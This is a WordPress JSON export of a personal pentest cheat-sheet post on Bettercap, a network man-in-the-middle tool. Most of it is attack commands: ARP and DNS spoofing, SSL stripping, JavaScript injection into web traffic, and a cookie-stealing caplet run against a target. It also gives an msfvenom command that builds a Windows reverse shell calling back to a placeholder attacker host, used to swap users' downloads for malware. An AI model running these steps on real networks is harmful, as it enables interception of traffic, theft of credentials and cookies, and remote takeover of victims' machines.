{"id":3078,"date":"2021-05-02T16:15:50","date_gmt":"2021-05-02T14:15:50","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=3078"},"modified":"2023-12-24T12:44:14","modified_gmt":"2023-12-24T11:44:14","slug":"bettercap","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=3078","title":{"rendered":"Bettercap"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">A Etter\u00adcap suc\u00adces\u00adsor, writ\u00adten in Go. Basic commands:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Pas\u00adsive <span class=\"caps\">ARP<\/span> probing:<ul><li><strong>net.recon on<\/strong><\/li><li><strong>net.recon off<\/strong><\/li><\/ul><\/li><li>Active prob\u00ading:<ul><li><strong>net.probe on<\/strong><\/li><li><strong>net.probe off<\/strong><\/li><\/ul><\/li><li>Sniff\u00ading:<ul><li><strong>set net.sniff.output \/tmp\/sniff.pcap<\/strong> \/\/ optional<\/li><\/ul><ul><li><strong>net.sniff on<\/strong><\/li><li><strong>net.sniff off<\/strong><\/li><\/ul><\/li><li>Spoof\u00ading:<ul><li><strong>set arp.spoof.targets $target1, $target2, $target3<\/strong><\/li><li><strong>arp.spoof on<\/strong><\/li><li><strong>arp.spoof off<\/strong><\/li><\/ul><\/li><li><span class=\"caps\">DNS<\/span> Spoof\u00ading:<ul><li><strong>set dns.spoof.domains target.domain<\/strong> \/\/ the domain which should be resolved as\u2026<\/li><li><strong>set dns.spoof.address $attacker_ip<\/strong> \/\/ this&nbsp;<span class=\"caps\">IP<\/span>.<\/li><li><strong>dns.spoof on<\/strong><\/li><li><strong>dns.spoof off<\/strong><\/li><\/ul><\/li><li><strong>net.show<\/strong> \/\/ all&nbsp;hosts<\/li><li><strong>net.show $ip_address<\/strong> \/\/ details about one&nbsp;host<\/li><\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Automa\u00adtion:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Repeat a set of com\u00admands reg\u00adu\u00adlar\u00adly. The fol\u00adlow\u00ading shows an updat\u00aded host dis\u00adcov\u00adery list each 8 sec\u00adonds.<br><code>set ticker.period 8<br>set ticker.commands \"clear; net.show;\"<\/code><\/li><li>Put a set of com\u00admands into a Caplet and exe\u00adcute it directly.<ol><li>Cre\u00adate a Caplet file:<br><code>events.clear<br>set ...<br>net.sniff on<\/code><\/li><li>Exe\u00adcute bet\u00adter\u00adcap:<br><code># bettercap -caplet caplet-file.caplet<\/code><\/li><\/ol><\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">HTTP<\/span>(S) proxy<\/h2>\n\n\n\n<ul class=\"wp-block-list\"><li><span class=\"caps\">HTTP<\/span> proxy<ul><li><strong>set http.proxy.sslstrip true<\/strong> \/\/ Replaces each https reference<\/li><li><strong>http.proxy on<\/strong><\/li><li><strong>http.proxy off<\/strong><\/li><\/ul><\/li><li><span class=\"caps\">HTTPS<\/span> proxy<ul><li><strong>set https.proxy.sslstrip true<\/strong> \/\/ Replaces each https reference<\/li><li><strong>https.proxy on<\/strong><\/li><li><strong>https.proxy off<\/strong><\/li><\/ul><\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Inject JavaScript into <span class=\"caps\">HTTP<\/span> responses<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Start spoof\u00ading and set injectjs:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">set http.proxy.injectjs \"console.log('aha');\"<br>http.proxy on<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This cre\u00adates a proxy on the local sys\u00adtem. All (<span class=\"caps\">HTML<\/span>?) con\u00adtent is added with the pro\u00advid\u00aded&nbsp;<span class=\"caps\">JS<\/span>.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">curl -x http:\/\/192.168.178.29:8080\/ http:\/\/naturtrunken.de\/<br>...<br>&lt;html&gt;...&lt;script type=\"text\/javascript\"&gt;console.log('aha');&lt;\/script&gt;...&lt;\/html&gt;<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Replace downloaded files<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">You want to replace a file a user wants to down\u00adload from anoth\u00ader serv\u00ader with your own&nbsp;file.<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>Cre\u00adate suit\u00adable pay\u00adloads for the tar\u00adget plat\u00adtforms and store them into the autop\u00adwn direc\u00adto\u00adry. In case of x64-Win\u00addows:<br><code>msfvenom -a x64 --platform windows -p windows\/x64\/shell\/reverse_tcp LHOST=$attacker LPORT=443 -f exe -o \/usr\/share\/bettercap\/caplets\/download-autopwn\/windows\/payload.exe<\/code><\/li><li>Start bet\u00adter\u00adcap:<br><code># bettercap -caplet \/usr\/share\/bettercap\/caplets\/download-autopwn\/download-autopwn.cap -eval 'events.ignore endpoint; set arp.spoof.targets $target; arp.spoof on'<\/code><\/li><\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Caplets<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">There are some Caplets avail\u00adable. Update them with <code>caplets.update<\/code> and show them with <code>caplets.show<\/code>. Note that by default all traf\u00adfic is spoofed; there\u00adfore it\u2019s bet\u00adter to use the caplets like&nbsp;this:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"># bettercap -caplet \/usr\/local\/share\/bettercap\/caplets\/steal-cookies\/steal-cookies.cap -eval \"set arp.spoof.targets $target\"<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Avail\u00adable Caplets at 2021\/05:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502 Name \u2502 Path \u2502 Size \u2502<br>\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524<br>\u2502 ap \u2502 \/usr\/share\/bettercap\/caplets\/ap.cap \u2502 570 B \u2502<br>\u2502 crypto-miner\/crypto-miner \u2502 \/usr\/share\/bettercap\/caplets\/crypto-miner\/crypto-miner.cap \u2502 666 B \u2502<br>\u2502 download-autopwn\/download-autopwn \u2502 \/usr\/share\/bettercap\/caplets\/download-autopwn\/download-autopwn.cap \u2502 2.6 kB \u2502<br>\u2502 fb-phish\/fb-phish \u2502 \/usr\/share\/bettercap\/caplets\/fb-phish\/fb-phish.cap \u2502 140 B \u2502<br>\u2502 gitspoof\/gitspoof \u2502 \/usr\/share\/bettercap\/caplets\/gitspoof\/gitspoof.cap \u2502 216 B \u2502<br>\u2502 gps \u2502 \/usr\/share\/bettercap\/caplets\/gps.cap \u2502 109 B \u2502<br>\u2502 hstshijack\/hstshijack \u2502 \/usr\/share\/bettercap\/caplets\/hstshijack\/hstshijack.cap \u2502 1.2 kB \u2502<br>\u2502 http-req-dump\/http-req-dump \u2502 \/usr\/share\/bettercap\/caplets\/http-req-dump\/http-req-dump.cap \u2502 591 B \u2502<br>\u2502 http-ui \u2502 \/usr\/share\/bettercap\/caplets\/http-ui.cap \u2502 376 B \u2502<br>\u2502 https-ui \u2502 \/usr\/share\/bettercap\/caplets\/https-ui.cap \u2502 655 B \u2502<br>\u2502 jsinject\/jsinject \u2502 \/usr\/share\/bettercap\/caplets\/jsinject\/jsinject.cap \u2502 210 B \u2502<br>\u2502 local-sniffer \u2502 \/usr\/share\/bettercap\/caplets\/local-sniffer.cap \u2502 244 B \u2502<br>\u2502 login-manager-abuse\/login-man-abuse \u2502 \/usr\/share\/bettercap\/caplets\/login-manager-abuse\/login-man-abuse.cap \u2502 236 B \u2502<br>\u2502 mana \u2502 \/usr\/share\/bettercap\/caplets\/mana.cap \u2502 61 B \u2502<br>\u2502 massdeauth \u2502 \/usr\/share\/bettercap\/caplets\/massdeauth.cap \u2502 302 B \u2502<br>\u2502 mitm6 \u2502 \/usr\/share\/bettercap\/caplets\/mitm6.cap \u2502 551 B \u2502<br>\u2502 netmon \u2502 \/usr\/share\/bettercap\/caplets\/netmon.cap \u2502 42 B \u2502<br>\u2502 pita \u2502 \/usr\/share\/bettercap\/caplets\/pita.cap \u2502 900 B \u2502<br>\u2502 proxy-script-test\/proxy-script-test \u2502 \/usr\/share\/bettercap\/caplets\/proxy-script-test\/proxy-script-test.cap \u2502 57 B \u2502<br>\u2502 pwnagotchi-auto \u2502 \/usr\/share\/bettercap\/caplets\/pwnagotchi-auto.cap \u2502 330 B \u2502<br>\u2502 pwnagotchi-manual \u2502 \/usr\/share\/bettercap\/caplets\/pwnagotchi-manual.cap \u2502 440 B \u2502<br>\u2502 rogue-mysql-server \u2502 \/usr\/share\/bettercap\/caplets\/rogue-mysql-server.cap \u2502 501 B \u2502<br>\u2502 rtfm\/rtfm \u2502 \/usr\/share\/bettercap\/caplets\/rtfm\/rtfm.cap \u2502 210 B \u2502<br>\u2502 simple-passwords-sniffer \u2502 \/usr\/share\/bettercap\/caplets\/simple-passwords-sniffer.cap \u2502 131 B \u2502<br>\u2502 steal-cookies\/steal-cookies \u2502 \/usr\/share\/bettercap\/caplets\/steal-cookies\/steal-cookies.cap \u2502 134 B \u2502<br>\u2502 tcp-req-dump\/tcp-req-dump \u2502 \/usr\/share\/bettercap\/caplets\/tcp-req-dump\/tcp-req-dump.cap \u2502 413 B \u2502<br>\u2502 web-override\/web-override \u2502 \/usr\/share\/bettercap\/caplets\/web-override\/web-override.cap \u2502 254 B \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>A Etter\u00adcap suc\u00adces\u00adsor, writ\u00adten in Go. Basic com\u00admands: Pas\u00adsive <span class=\"caps\">ARP<\/span> prob\u00ading:&nbsp; net.recon on net.recon off Active prob\u00ading: net.probe on net.probe off Sniff\u00ading: set net.sniff.output \/tmp\/sniff.pcap \/\/ option\u00adal net.sniff on net.sniff off Spoof\u00ading: set arp.spoof.targets $target1, $target2, $target3 arp.spoof on arp.spoof off <span class=\"caps\">DNS<\/span> Spoof\u00ading: set dns.spoof.domains target.domain \/\/ the domain which should be resolved as\u2026&nbsp;set&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[470,471,475,476],"tags":[388,389],"class_list":["post-3078","post","type-post","status-publish","format-standard","hentry","category-active-enum","category-privesc","category-attack-tool","category-defence-tool","tag-bettercap","tag-mitm"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/3078","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3078"}],"version-history":[{"count":8,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/3078\/revisions"}],"predecessor-version":[{"id":3092,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/3078\/revisions\/3092"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3078"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3078"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3078"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}